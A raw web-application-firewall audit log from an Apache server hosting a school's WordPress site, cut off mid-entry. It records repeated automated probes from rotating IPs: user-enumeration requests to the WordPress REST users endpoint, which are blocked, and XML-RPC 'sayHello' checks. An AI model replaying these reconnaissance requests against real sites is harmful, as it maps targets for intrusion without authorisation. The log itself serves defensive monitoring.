proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445647513151 4881 (- - -) Stopwatch2: 1747445647513151 4881; combined=3565, p1=506, p2=2877, p3=25, p4=28, p5=77, sr=64, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58a05823-Z-- --da49ef2e-A-- [17/May/2025:08:34:16 +0700] aCfnmOm4kjNN-hEbWjJBEgAAAEk 103.236.140.4 44134 103.236.140.4 8181 --da49ef2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da49ef2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da49ef2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445656487266 3119 (- - -) Stopwatch2: 1747445656487266 3119; combined=1332, p1=430, p2=872, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da49ef2e-Z-- --7668407e-A-- [17/May/2025:08:34:21 +0700] aCfnnem4kjNN-hEbWjJBEwAAAEo 103.236.140.4 44138 103.236.140.4 8181 --7668407e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7668407e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7668407e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445661042068 3663 (- - -) Stopwatch2: 1747445661042068 3663; combined=1432, p1=507, p2=891, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7668407e-Z-- --10df5b29-A-- [17/May/2025:08:34:21 +0700] aCfnnQTOsBn9MSWb6WJutQAAAIY 103.236.140.4 44140 103.236.140.4 8181 --10df5b29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --10df5b29-C-- demo.sayHello --10df5b29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --10df5b29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445661767951 5371 (- - -) Stopwatch2: 1747445661767951 5371; combined=4374, p1=461, p2=3679, p3=38, p4=42, p5=90, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10df5b29-Z-- --77c6a805-A-- [17/May/2025:08:34:26 +0700] aCfnoum4kjNN-hEbWjJBFwAAAFA 103.236.140.4 44150 103.236.140.4 8181 --77c6a805-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77c6a805-C-- demo.sayHello --77c6a805-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77c6a805-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445666658496 5782 (- - -) Stopwatch2: 1747445666658496 5782; combined=4264, p1=509, p2=3526, p3=29, p4=31, p5=99, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77c6a805-Z-- --58e69a5a-A-- [17/May/2025:08:34:27 +0700] aCfnowTOsBn9MSWb6WJutgAAAIU 103.236.140.4 44152 103.236.140.4 8181 --58e69a5a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58e69a5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58e69a5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445667381967 1976 (- - -) Stopwatch2: 1747445667381967 1976; combined=1042, p1=364, p2=658, p3=0, p4=0, p5=19, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58e69a5a-Z-- --f060cc22-A-- [17/May/2025:08:34:35 +0700] aCfnq-m4kjNN-hEbWjJBGgAAAFU 103.236.140.4 44158 103.236.140.4 8181 --f060cc22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f060cc22-C-- demo.sayHello --f060cc22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f060cc22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445675040237 5608 (- - -) Stopwatch2: 1747445675040237 5608; combined=4113, p1=542, p2=3348, p3=35, p4=35, p5=90, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f060cc22-Z-- --bd89e466-A-- [17/May/2025:08:34:44 +0700] aCfntOm4kjNN-hEbWjJBHAAAAFc 103.236.140.4 44162 103.236.140.4 8181 --bd89e466-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd89e466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd89e466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445684646819 3451 (- - -) Stopwatch2: 1747445684646819 3451; combined=1485, p1=512, p2=937, p3=0, p4=0, p5=36, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd89e466-Z-- --4728ce61-A-- [17/May/2025:08:34:46 +0700] aCfntum4kjNN-hEbWjJBHQAAAFg 103.236.140.4 44164 103.236.140.4 8181 --4728ce61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4728ce61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4728ce61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445686254742 2500 (- - -) Stopwatch2: 1747445686254742 2500; combined=1190, p1=381, p2=779, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4728ce61-Z-- --1e769d4f-A-- [17/May/2025:08:34:52 +0700] aCfnvOm4kjNN-hEbWjJBIAAAAEU 103.236.140.4 44170 103.236.140.4 8181 --1e769d4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e769d4f-C-- demo.sayHello --1e769d4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e769d4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445692992036 5580 (- - -) Stopwatch2: 1747445692992036 5580; combined=4162, p1=556, p2=3381, p3=30, p4=31, p5=99, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e769d4f-Z-- --dbf9fb4f-A-- [17/May/2025:08:34:53 +0700] aCfnvQTOsBn9MSWb6WJutwAAAIg 103.236.140.4 44172 103.236.140.4 8181 --dbf9fb4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbf9fb4f-C-- demo.sayHello --dbf9fb4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbf9fb4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445693641212 5007 (- - -) Stopwatch2: 1747445693641212 5007; combined=3725, p1=446, p2=3067, p3=23, p4=25, p5=96, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbf9fb4f-Z-- --241d9957-A-- [17/May/2025:08:35:19 +0700] aCfn1-m4kjNN-hEbWjJBIwAAAEg 103.236.140.4 44178 103.236.140.4 8181 --241d9957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --241d9957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --241d9957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445719806729 3175 (- - -) Stopwatch2: 1747445719806729 3175; combined=1378, p1=480, p2=868, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --241d9957-Z-- --79c8031f-A-- [17/May/2025:08:35:22 +0700] aCfn2gTOsBn9MSWb6WJuuQAAAIs 103.236.140.4 44184 103.236.140.4 8181 --79c8031f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --79c8031f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79c8031f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445722255365 2270 (- - -) Stopwatch2: 1747445722255365 2270; combined=1181, p1=392, p2=759, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79c8031f-Z-- --6200914f-A-- [17/May/2025:08:35:25 +0700] aCfn3QTOsBn9MSWb6WJuvQAAAJA 103.236.140.4 44194 103.236.140.4 8181 --6200914f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6200914f-C-- demo.sayHello --6200914f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6200914f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445725809086 3350 (- - -) Stopwatch2: 1747445725809086 3350; combined=2659, p1=357, p2=2161, p3=22, p4=23, p5=57, sr=71, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6200914f-Z-- --35e5af1e-A-- [17/May/2025:08:35:28 +0700] aCfn4ATOsBn9MSWb6WJuvgAAAI8 103.236.140.4 44196 103.236.140.4 8181 --35e5af1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --35e5af1e-C-- demo.sayHello --35e5af1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e5af1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445728406090 5457 (- - -) Stopwatch2: 1747445728406090 5457; combined=4105, p1=513, p2=3353, p3=28, p4=31, p5=104, sr=83, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e5af1e-Z-- --ab4e4f06-A-- [17/May/2025:08:35:59 +0700] aCfn_xKi5m5upc8uMd6iOAAAANc 103.236.140.4 44204 103.236.140.4 8181 --ab4e4f06-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab4e4f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab4e4f06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445759489229 3115 (- - -) Stopwatch2: 1747445759489229 3115; combined=1334, p1=425, p2=873, p3=0, p4=0, p5=35, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab4e4f06-Z-- --7d603f48-A-- [17/May/2025:08:35:59 +0700] aCfn_3yxdQCiyU1ENFcnxAAAAAw 103.236.140.4 44206 103.236.140.4 8181 --7d603f48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d603f48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d603f48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445759670493 2050 (- - -) Stopwatch2: 1747445759670493 2050; combined=950, p1=329, p2=594, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d603f48-Z-- --47ccda63-A-- [17/May/2025:08:35:59 +0700] aCfn_-m4kjNN-hEbWjJBJgAAAEw 103.236.140.4 44208 103.236.140.4 8181 --47ccda63-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47ccda63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47ccda63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive 